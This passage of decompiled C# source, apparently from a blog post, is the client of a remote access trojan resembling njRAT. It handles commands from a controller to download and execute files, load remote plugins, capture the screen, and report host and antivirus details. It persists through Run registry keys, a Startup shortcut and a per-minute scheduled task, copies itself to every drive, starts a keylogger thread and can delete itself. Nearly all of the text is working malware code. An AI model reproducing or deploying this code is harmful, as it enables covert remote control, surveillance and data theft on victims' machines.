Process.Start(text6); OK.Send("MSG" + OK.Y + "Executed As " + new FileInfo(text6).Name); } catch (Exception ex9) { ProjectData.SetProjectError(ex9); Exception ex10 = ex9; ProjectData.SetProjectError(ex10); Exception ex11 = ex10; OK.Send("MSG" + OK.Y + "Execute ERROR " + ex11.Message); ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } else if (Operators.CompareString(text, "inv", false) != 0) { string text8; if (Operators.CompareString(text, "ret", false) != 0) { if (Operators.CompareString(text, "CAP", false) != 0) { if (Operators.CompareString(text, "un", false) == 0) { string left2 = array[1]; if (Operators.CompareString(left2, "~", false) != 0) { if (Operators.CompareString(left2, "!", false) != 0) { if (Operators.CompareString(left2, "@", false) == 0) { OK.pr(0); Process.Start(OK.LO.FullName); ProjectData.EndApp(); } } else { OK.pr(0); ProjectData.EndApp(); } } else { OK.UNS(); } } else if (Operators.CompareString(text, "up", false) == 0) { byte[] array10 = null; if (array[1][0] == '\u001f') { try { MemoryStream memoryStream2 = new MemoryStream(); int length2 = (array[0] + OK.Y).Length; memoryStream2.Write(b, length2, b.Length - length2); array10 = OK.ZIP(memoryStream2.ToArray()); } catch (Exception ex12) { ProjectData.SetProjectError(ex12); Exception ex13 = ex12; ProjectData.SetProjectError(ex13); Exception ex14 = ex13; OK.Send("MSG" + OK.Y + "Update ERROR"); OK.Send("bla"); ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); return; } } else { WebClient webClient2 = new WebClient(); try { array10 = webClient2.DownloadData(array[1]); } catch (Exception ex15) { ProjectData.SetProjectError(ex15); Exception ex16 = ex15; ProjectData.SetProjectError(ex16); Exception ex17 = ex16; OK.Send("MSG" + OK.Y + "Update ERROR"); OK.Send("bla"); ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); return; } } OK.Send("bla"); string text7 = Path.GetTempFileName() + ".exe"; try { OK.Send("MSG" + OK.Y + "Updating To " + new FileInfo(text7).Name); Thread.Sleep(2000); File.WriteAllBytes(text7, array10); Process.Start(text7, ".."); } catch (Exception ex18) { ProjectData.SetProjectError(ex18); Exception ex19 = ex18; ProjectData.SetProjectError(ex19); Exception ex20 = ex19; OK.Send("MSG" + OK.Y + "Update ERROR " + ex20.Message); ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); return; } OK.UNS(); } else { if (Operators.CompareString(text, "Ex", false) == 0) { if (OK.PLG == null) { OK.Send("PLG"); int num3 = 0; while (!(OK.PLG != null | num3 == 20 | !OK.Cn)) { num3++; Thread.Sleep(1000); } if (!(OK.PLG == null | !OK.Cn)) { goto IL_18fd; } goto end_IL_0015; } goto IL_18fd; } if (Operators.CompareString(text, "PLG", false) == 0) { MemoryStream memoryStream3 = new MemoryStream(); int length3 = (array[0] + OK.Y).Length; memoryStream3.Write(b, length3, b.Length - length3); OK.PLG = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(OK.Plugin(OK.ZIP(memoryStream3.ToArray()), "A"))); NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(OK.PLG), null, "H", new object[1] { OK.H }, null, null); NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(OK.PLG), null, "P", new object[1] { OK.P }, null, null); NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(OK.PLG), null, "c", new object[1] { OK.C }, null, null); } } } else { Rectangle targetRect = Screen.PrimaryScreen.Bounds; Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, targetRect.Height, PixelFormat.Format16bppRgb555); Graphics graphics = Graphics.FromImage(bitmap); Size blockRegionSize = new Size(bitmap.Width, bitmap.Height); graphics.CopyFromScreen(0, 0, 0, 0, blockRegionSize, CopyPixelOperation.SourceCopy); try { blockRegionSize = new Size(32, 32); targetRect = new Rectangle(Cursor.Position, blockRegionSize); Cursors.Default.Draw(graphics, targetRect); } catch (Exception ex21) { ProjectData.SetProjectError(ex21); Exception ex22 = ex21; ProjectData.SetProjectError(ex22); Exception ex23 = ex22; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } graphics.Dispose(); Bitmap bitmap2 = new Bitmap(Conversions.ToInteger(array[1]), Conversions.ToInteger(array[2])); graphics = Graphics.FromImage(bitmap2); graphics.DrawImage(bitmap, 0, 0, bitmap2.Width, bitmap2.Height); graphics.Dispose(); MemoryStream memoryStream4 = new MemoryStream(); text8 = "CAP" + OK.Y; b = OK.SB(ref text8); memoryStream4.Write(b, 0, b.Length); MemoryStream memoryStream5 = new MemoryStream(); bitmap2.Save(memoryStream5, ImageFormat.Jpeg); string left3 = OK.md5(memoryStream5.ToArray()); if (Operators.CompareString(left3, OK.lastcap, false) != 0) { OK.lastcap = left3; memoryStream4.Write(memoryStream5.ToArray(), 0, (int)memoryStream5.Length); } else { memoryStream4.WriteByte(0); } OK.Sendb(memoryStream4.ToArray()); memoryStream4.Dispose(); memoryStream5.Dispose(); bitmap.Dispose(); bitmap2.Dispose(); } } else { byte[] array11 = unchecked((byte[])OK.GTV(array[1], new byte[0])); if (array[2].Length < 10 & array11.Length == 0) { OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(1)); } else { if (array[2].Length > 10) { MemoryStream memoryStream6 = new MemoryStream(); int length4 = (array[0] + OK.Y + array[1] + OK.Y).Length; memoryStream6.Write(b, length4, b.Length - length4); array11 = OK.ZIP(memoryStream6.ToArray()); OK.STV(array[1], array11, RegistryValueKind.Binary); } OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(0)); object objectValue3 = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(OK.Plugin(array11, "A"))); string[] obj = new string[5] { "ret", OK.Y, array[1], OK.Y, null }; text8 = Conversions.ToString(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue3), null, "GT", new object[0], null, null, null))); obj[4] = OK.ENB(ref text8); OK.Send(string.Concat(obj)); } } } else { byte[] array12 = unchecked((byte[])OK.GTV(array[1], new byte[0])); if (array[3].Length < 10 & array12.Length == 0) { OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(1)); } else { if (array[3].Length > 10) { MemoryStream memoryStream7 = new MemoryStream(); int length5 = (array[0] + OK.Y + array[1] + OK.Y + array[2] + OK.Y).Length; memoryStream7.Write(b, length5, b.Length - length5); array12 = OK.ZIP(memoryStream7.ToArray()); OK.STV(array[1], array12, RegistryValueKind.Binary); } OK.Send("pl" + OK.Y + array[1] + OK.Y + Conversions.ToString(0)); object objectValue4 = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(OK.Plugin(array12, "A"))); NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "h", new object[1] { OK.H }, null, null); NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "p", new object[1] { OK.P }, null, null); NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "osk", new object[1] { array[2] }, null, null); NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(objectValue4), null, "start", new object[0], null, null, null, true); while (!Conversions.ToBoolean(RuntimeHelpers.GetObjectValue(Operators.OrObject(!OK.Cn, RuntimeHelpers.GetObjectValue(Operators.CompareObjectEqual(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(RuntimeHelpers.GetObjectValue(objectValue4), null, "Off", new object[0], null, null, null)), true, false)))))) { Thread.Sleep(1); } NewLateBinding.LateSet(RuntimeHelpers.GetObjectValue(objectValue4), null, "off", new object[1] { true }, null, null); } } goto end_IL_0015; } IL_18fd: object[] array13 = new object[1] { b }; bool[] array14 = new bool[1] { true }; NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(OK.PLG), null, "ind", array13, null, null, array14, true); if (array14[0]) { b = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(array13[0])), typeof(byte[])); } end_IL_0015:; } catch (Exception ex24) { ProjectData.SetProjectError(ex24); Exception ex25 = ex24; ProjectData.SetProjectError(ex25); Exception ex26 = ex25; if (array.Length > 0 && (Operators.CompareString(array[0], "Ex", false) == 0 | Operators.CompareString(array[0], "PLG", false) == 0)) { OK.PLG = null; } try { OK.Send("ER" + OK.Y + array[0] + OK.Y + ex26.Message); } catch (Exception ex27) { ProjectData.SetProjectError(ex27); Exception ex28 = ex27; ProjectData.SetProjectError(ex28); Exception ex29 = ex28; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } public static string inf() { string text = "ll" + OK.Y; string text2; try { if (Operators.ConditionalCompareObjectEqual(RuntimeHelpers.GetObjectValue(OK.GTV("vn", "")), "", false)) { string str = text; text2 = OK.DEB(ref OK.VN) + "_" + OK.HWD(); text = str + OK.ENB(ref text2) + OK.Y; } else { string str2 = text; string text3 = Conversions.ToString(RuntimeHelpers.GetObjectValue(OK.GTV("vn", ""))); text2 = OK.DEB(ref text3) + "_" + OK.HWD(); text = str2 + OK.ENB(ref text2) + OK.Y; } } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; string str3 = text; text2 = OK.HWD(); text = str3 + OK.ENB(ref text2) + OK.Y; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { text = text + Environment.MachineName + OK.Y; } catch (Exception ex4) { ProjectData.SetProjectError(ex4); Exception ex5 = ex4; ProjectData.SetProjectError(ex5); Exception ex6 = ex5; text = text + "??" + OK.Y; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { text = text + Environment.UserName + OK.Y; } catch (Exception ex7) { ProjectData.SetProjectError(ex7); Exception ex8 = ex7; ProjectData.SetProjectError(ex8); Exception ex9 = ex8; text = text + "??" + OK.Y; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { string str4 = text; DateTime dateTime = OK.LO.LastWriteTime; dateTime = dateTime.Date; text = str4 + dateTime.ToString("yy-MM-dd") + OK.Y; } catch (Exception ex10) { ProjectData.SetProjectError(ex10); Exception ex11 = ex10; ProjectData.SetProjectError(ex11); Exception ex12 = ex11; text = text + "??-??-??" + OK.Y; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } text += OK.Y; try { text += OK.F.Info.OSFullName.Replace("Microsoft", "").Replace("Windows", "Win").Replace("®", "") .Replace("™", "") .Replace(" ", " ") .Replace(" Win", "Win"); } catch (Exception ex13) { ProjectData.SetProjectError(ex13); Exception ex14 = ex13; ProjectData.SetProjectError(ex14); Exception ex15 = ex14; text += "??"; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } text += "SP"; try { string[] array = Strings.Split(Environment.OSVersion.ServicePack, " ", -1, CompareMethod.Binary); if (array.Length == 1) { text += "0"; } text += array[checked(array.Length - 1)]; } catch (Exception ex16) { ProjectData.SetProjectError(ex16); Exception ex17 = ex16; ProjectData.SetProjectError(ex17); Exception ex18 = ex17; text += "0"; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { text = ((!Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).Contains("x86")) ? (text + " x86" + OK.Y) : (text + " x64" + OK.Y)); } catch (Exception ex19) { ProjectData.SetProjectError(ex19); Exception ex20 = ex19; ProjectData.SetProjectError(ex20); Exception ex21 = ex20; text += OK.Y; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } text = ((!OK.Cam()) ? (text + "No" + OK.Y) : (text + "Yes" + OK.Y)); text = text + OK.GetAntiVirus() + OK.Y + OK.GetAntiVirus() + OK.Y + OK.GetAntiVirus() + OK.Y; string text4 = ""; try { string[] valueNames = OK.F.Registry.CurrentUser.CreateSubKey("Software\\" + OK.RG, RegistryKeyPermissionCheck.Default).GetValueNames(); foreach (string text5 in valueNames) { if (text5.Length == 32) { text4 = text4 + text5 + ","; } } } catch (Exception ex22) { ProjectData.SetProjectError(ex22); Exception ex23 = ex22; ProjectData.SetProjectError(ex23); Exception ex24 = ex23; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return text + text4; } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public static void INS() { Thread.Sleep(1000); if (OK.Idr && !OK.CompDir(OK.LO, new FileInfo(Interaction.Environ(OK.DR).ToLower() + "\\" + OK.EXE.ToLower()))) { try { if (File.Exists(Interaction.Environ(OK.DR) + "\\" + OK.EXE)) { File.Delete(Interaction.Environ(OK.DR) + "\\" + OK.EXE); } FileStream fileStream = new FileStream(Interaction.Environ(OK.DR) + "\\" + OK.EXE, FileMode.CreateNew); byte[] array = File.ReadAllBytes(OK.LO.FullName); fileStream.Write(array, 0, array.Length); fileStream.Flush(); fileStream.Close(); OK.LO = new FileInfo(Interaction.Environ(OK.DR) + "\\" + OK.EXE); Process.Start(OK.LO.FullName); ProjectData.EndApp(); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.EndApp(); ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } try { Environment.SetEnvironmentVariable("SEE_MASK_NOZONECHECKS", "1", EnvironmentVariableTarget.User); } catch (Exception ex4) { ProjectData.SetProjectError(ex4); Exception ex5 = ex4; ProjectData.SetProjectError(ex5); Exception ex6 = ex5; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } if (OK.Isu) { try { OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" .."); } catch (Exception ex7) { ProjectData.SetProjectError(ex7); Exception ex8 = ex7; ProjectData.SetProjectError(ex8); Exception ex9 = ex8; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" .."); } catch (Exception ex10) { ProjectData.SetProjectError(ex10); Exception ex11 = ex10; ProjectData.SetProjectError(ex11); Exception ex12 = ex11; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } if (OK.IsF) { try { if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG)) { File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG); } File.Copy(OK.LO.FullName, Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG, true); string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG); string str = fileNameWithoutExtension; if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + str + ".url")) { File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + str + ".url"); } string text = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG; string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup); object obj = new StreamWriter(folderPath + "\\" + str + ".url"); try { File.SetAttributes(text, FileAttributes.Hidden); NewLateBinding.LateCall(obj, null, "WriteLine", new object[1] { "[InternetShortcut]" }, null, null, null, true); NewLateBinding.LateCall(obj, null, "WriteLine", new object[1] { "URL=file:///" + text }, null, null, null, true); NewLateBinding.LateCall(obj, null, "WriteLine", new object[1] { "IconIndex=17" }, null, null, null, true); NewLateBinding.LateCall(obj, null, "WriteLine", new object[1] { "IconFile=C:\\Windows\\system32\\SHELL32.dll" }, null, null, null, true); NewLateBinding.LateCall(obj, null, "Flush", new object[0], null, null, null, true); } finally { if (obj != null) { ((IDisposable)obj).Dispose(); } } if (Conversions.ToBoolean(OK.HIDE_ME)) { File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden); } } catch (Exception ex13) { ProjectData.SetProjectError(ex13); Exception ex14 = ex13; ProjectData.SetProjectError(ex14); Exception ex15 = ex14; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public static void ko() { checked { Thread.Sleep((int)Math.Round(Math.Round(Math.Round(unchecked(Conversions.ToDouble(OK.SLP) * 1000.0))))); if (OK.Anti_CH) { try { MyAntiProcess.Start(); } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } if (OK.BOT_KILL) { try { BotKillers.RunStandardBotKiller(); Thread.Sleep(50); } catch (Exception projectError2) { ProjectData.SetProjectError(projectError2); ProjectData.ClearProjectError(); } } if (OK.USB_SP) { try { string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles; string[] logicalDrives = Directory.GetLogicalDrives(); string[] array = logicalDrives; foreach (string programFiles in array) { try { if (!File.Exists(programFiles + OK.RG)) { File.Copy(Assembly.GetExecutingAssembly().Location, programFiles + OK.RG); } } catch (Exception projectError3) { ProjectData.SetProjectError(projectError3); ProjectData.ClearProjectError(); } } } catch (Exception projectError4) { ProjectData.SetProjectError(projectError4); ProjectData.ClearProjectError(); } } if (OK.Persis) { try { object executablePath = Application.ExecutablePath; Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject("schtasks /create /tn NYAN /tr \"", executablePath), "\" /sc minute /mo 1")), AppWinStyle.Hide, false, -1); } catch (Exception projectError5) { ProjectData.SetProjectError(projectError5); ProjectData.ClearProjectError(); } } if (Interaction.Command() != null) { try { OK.F.Registry.CurrentUser.SetValue("di", "!"); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } Thread.Sleep(5000); } bool flag = false; OK.MT = new Mutex(true, OK.RG, out flag); if (!flag) { ProjectData.EndApp(); } OK.INS(); if (!OK.Idr) { OK.EXE = OK.LO.Name; OK.DR = OK.LO.Directory.Name; } Thread thread = new Thread(OK.RC, 1); thread.Start(); try { OK.kq = new kl(); Thread thread2 = new Thread(OK.kq.WRK, 1); thread2.Start(); } catch (Exception ex4) { ProjectData.SetProjectError(ex4); Exception ex5 = ex4; ProjectData.SetProjectError(ex5); Exception ex6 = ex5; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } int num = 0; string left = ""; if (OK.BD) { try { SystemEvents.SessionEnding += OK._Lambda__2; OK.pr(1); } catch (Exception ex7) { ProjectData.SetProjectError(ex7); Exception ex8 = ex7; ProjectData.SetProjectError(ex8); Exception ex9 = ex8; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } while (true) { Thread.Sleep(1000); if (!OK.Cn) { left = ""; } Application.DoEvents(); try { num++; if (num == 5) { try { Process.GetCurrentProcess().MinWorkingSet = (IntPtr)1024; } catch (Exception ex10) { ProjectData.SetProjectError(ex10); Exception ex11 = ex10; ProjectData.SetProjectError(ex11); Exception ex12 = ex11; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } if (num >= 8) { num = 0; string text = OK.ACT(); if (Operators.CompareString(left, text, false) != 0) { left = text; OK.Send("act" + OK.Y + text); } } if (OK.Isu) { try { if (Operators.ConditionalCompareObjectNotEqual(RuntimeHelpers.GetObjectValue(OK.F.Registry.CurrentUser.GetValue(OK.sf + "\\" + OK.RG, "")), "\"" + OK.LO.FullName + "\" ..", false)) { OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" .."); } } catch (Exception ex13) { ProjectData.SetProjectError(ex13); Exception ex14 = ex13; ProjectData.SetProjectError(ex14); Exception ex15 = ex14; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { if (Operators.ConditionalCompareObjectNotEqual(RuntimeHelpers.GetObjectValue(OK.F.Registry.LocalMachine.GetValue(OK.sf + "\\" + OK.RG, "")), "\"" + OK.LO.FullName + "\" ..", false)) { OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" .."); } } catch (Exception ex16) { ProjectData.SetProjectError(ex16); Exception ex17 = ex16; ProjectData.SetProjectError(ex17); Exception ex18 = ex17; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } } catch (Exception ex19) { ProjectData.SetProjectError(ex19); Exception ex20 = ex19; ProjectData.SetProjectError(ex20); Exception ex21 = ex20; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } } } public static string md5(byte[] B) { B = new MD5CryptoServiceProvider().ComputeHash(B); string text = ""; byte[] array = B; for (int i = 0; i < array.Length; i = checked(i + 1)) { byte b = array[i]; text += b.ToString("x2"); } return text; } [DllImport("ntdll")] private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength); public static object Plugin(byte[] b, string c) { Module[] modules = Assembly.Load(b).GetModules(); foreach (Module module in modules) { Type[] types = module.GetTypes(); foreach (Type type in types) { if (type.FullName.EndsWith("." + c)) { return module.Assembly.CreateInstance(type.FullName); } } } return null; } public static void pr(int i) { try { OK.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i, 4); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } public static void RC() { checked { while (true) { OK.lastcap = ""; if (OK.C != null) { long num = -1L; int num2 = 0; try { while (true) { IL_0021: num2++; if (num2 == 10) { num2 = 0; Thread.Sleep(1); } if (OK.Cn) { if (OK.C.Available < 1) { OK.C.Client.Poll(-1, SelectMode.SelectRead); } while (true) { if (OK.C.Available <= 0) { break; } string text; if (num == -1) { text = ""; while (true) { int num3 = OK.C.GetStream().ReadByte(); switch (num3) { case -1: break; case 0: goto IL_00cb; default: text += Conversions.ToString(Conversions.ToInteger(Strings.ChrW(num3).ToString())); continue; } break; } break; } OK.b = new byte[OK.C.Available + 1 - 1 + 1]; long num4 = num - OK.MeM.Length; if (OK.b.Length > num4) { OK.b = new byte[(int)(num4 - 1) + 1 - 1 + 1]; } int count = OK.C.Client.Receive(OK.b, 0, OK.b.Length, SocketFlags.None); OK.MeM.Write(OK.b, 0, count); if (OK.MeM.Length == num) { num = -1L; Thread thread = new Thread(OK._Lambda__1, 1); thread.Start(OK.MeM.ToArray()); thread.Join(100); OK.MeM.Dispose(); OK.MeM = new MemoryStream(); } goto IL_0021; IL_00cb: num = Conversions.ToLong(text); text = ""; if (num == 0) { OK.Send(""); num = -1L; } if (OK.C.Available <= 0) { goto IL_0021; } } } break; } } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } } do { try { if (OK.PLG != null) { NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(OK.PLG), null, "clear", new object[0], null, null, null, true); OK.PLG = null; } } catch (Exception ex4) { ProjectData.SetProjectError(ex4); Exception ex5 = ex4; ProjectData.SetProjectError(ex5); Exception ex6 = ex5; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } OK.Cn = false; } while (!OK.connect()); OK.Cn = true; } } } public static byte[] SB(ref string S) { return Encoding.UTF8.GetBytes(S); } public static bool Send(string S) { return OK.Sendb(OK.SB(ref S)); } public static bool Sendb(byte[] b) { if (!OK.Cn) { return false; } try { FileInfo lO = OK.LO; lock (lO) { if (!OK.Cn) { return false; } MemoryStream memoryStream = new MemoryStream(); string text = b.Length.ToString() + "\0"; byte[] array = OK.SB(ref text); memoryStream.Write(array, 0, array.Length); memoryStream.Write(b, 0, b.Length); OK.C.Client.Send(memoryStream.ToArray(), 0, checked((int)memoryStream.Length), SocketFlags.None); } } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; try { if (OK.Cn) { OK.Cn = false; OK.C.Close(); } } catch (Exception ex4) { ProjectData.SetProjectError(ex4); Exception ex5 = ex4; ProjectData.SetProjectError(ex5); Exception ex6 = ex5; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return OK.Cn; } public static bool STV(string n, object t, RegistryValueKind typ) { bool result; try { OK.F.Registry.CurrentUser.CreateSubKey("Software\\" + OK.RG).SetValue(n, RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(t)), typ); result = true; } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; result = false; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } return result; } [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)] public static void UNS() { string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles; string[] logicalDrives = Directory.GetLogicalDrives(); string[] array = logicalDrives; foreach (string programFiles in array) { try { if (File.Exists(programFiles + OK.RG)) { File.Delete(programFiles + OK.RG); } } catch (Exception projectError) { ProjectData.SetProjectError(projectError); ProjectData.ClearProjectError(); } } OK.pr(0); OK.Isu = false; try { OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); Exception ex2 = ex; ProjectData.SetProjectError(ex2); Exception ex3 = ex2; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false); } catch (Exception ex4) { ProjectData.SetProjectError(ex4); Exception ex5 = ex4; ProjectData.SetProjectError(ex5); Exception ex6 = ex5; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { if (OK.HIDE_ME) { File.SetAttributes(Interaction.Environ(OK.DR) + "\\" + OK.EXE, FileAttributes.Normal); } string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG); File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + fileNameWithoutExtension + ".url"); File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG); } catch (Exception ex7) { ProjectData.SetProjectError(ex7); Exception ex8 = ex7; ProjectData.SetProjectError(ex8); Exception ex9 = ex8; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { OK.F.Registry.CurrentUser.OpenSubKey("Software", true).DeleteSubKey(OK.RG, false); } catch (Exception ex10) { ProjectData.SetProjectError(ex10); Exception ex11 = ex10; ProjectData.SetProjectError(ex11); Exception ex12 = ex11; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } try { Interaction.Shell("cmd.exe /c ping 0 -n 2 & del \"" + OK.LO.FullName + "\"", AppWinStyle.Hide, false, -1); } catch (Exception ex13) { ProjectData.SetProjectError(ex13); Exception ex14 = ex13; ProjectData.SetProjectError(ex14); Exception ex15 = ex14; ProjectData.ClearProjectError(); ProjectData.ClearProjectError(); } ProjectData.EndApp(); } public static byte[] ZIP(byte[] B) { MemoryStream memoryStream = new MemoryStream(B); GZipStream gZipStream = new GZipStream(memoryStream, CompressionMode.Decompress); byte[] array = new byte[4]; checked { memoryStream.Position = memoryStream.Length - 5; memoryStream.Read(array, 0, 4); int num = BitConverter.ToInt32(array, 0); memoryStream.Position = 0L; byte[] array2 = new byte[num - 1 + 1 - 1 + 1]; gZipStream.Read(array2, 0, num); gZipStream.Dispose(); memoryStream.Dispose(); return array2; } } }
No comments:
Post a Comment